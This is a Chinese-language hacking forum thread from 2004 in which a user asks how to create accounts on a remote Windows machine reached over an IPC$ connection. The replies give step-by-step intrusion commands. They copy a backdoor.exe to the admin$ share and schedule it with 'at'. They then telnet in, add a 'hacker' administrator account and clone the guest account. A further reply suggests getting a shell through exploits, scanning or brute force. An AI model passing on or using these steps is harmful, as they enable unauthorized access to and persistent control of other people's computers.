|
作者: syq2002syq [syq2002syq] 论坛用户 | 登录 |
我想请教一个问题:我和一台电脑成功进行IPC$连接后,用net user aaa aaa /add这个命令时添加的用户怎么会加在自己的电脑上的啊!?如果我想在已经建立连接的电脑上添加用户应该如何实现?谢谢! |
地主 发表时间: 04-05-20 23:43 |
回复: fangjunlin [fangjunlin] 论坛用户 | 登录 |
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add |
B1层 发表时间: 04-05-20 23:46 |
回复: syq2002syq [syq2002syq] 论坛用户 | 登录 |
谢谢你的回复!可是我是这样先建立连接再建用户的啊!问题是建的用户位于自己的电脑上! 那我有什么用呢? |
B2层 发表时间: 04-05-20 23:56 |
回复: uncracker [uncracker] 论坛用户 | 登录 |
在获得shell以后才能创建用户 你的IPC$如果是admin权限,可以按下面的步骤进行 copy backdoor.exe \\对方IP\admin$ net time \\对方IP at \\对方IP 00:00 backdoor.exe 这里的时间要比用net time 的到的时间晚2分钟 过一会就可以telnet 到对方的机器了。 然后net use hacker hacker /add net localgroup administrators hacker /add 另外我们可以看看对方的guest帐户是否开放,如果是禁用的可以用ca克隆 ca \\IP hacker hacker guest newpassword |
B3层 发表时间: 04-05-21 00:07 |
回复: syq2002syq [syq2002syq] 论坛用户 | 登录 |
谢谢 uncracker .我明白了! |
B4层 发表时间: 04-05-21 09:05 |
回复: yangliwei [yangliwei] 论坛用户 | 登录 |
net user 是创建用户的, 但由于楼主只是成功建立IPC连接, 但取得对方Shell, 或是登录到对方机器上, 才能用这个命令建立用户, 如何获得对方Shell呀? 可以用对方系统的漏洞进行溢出, 也可用扫, 或是用暴力破解! 好了! |
B5层 发表时间: 04-05-21 10:47 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号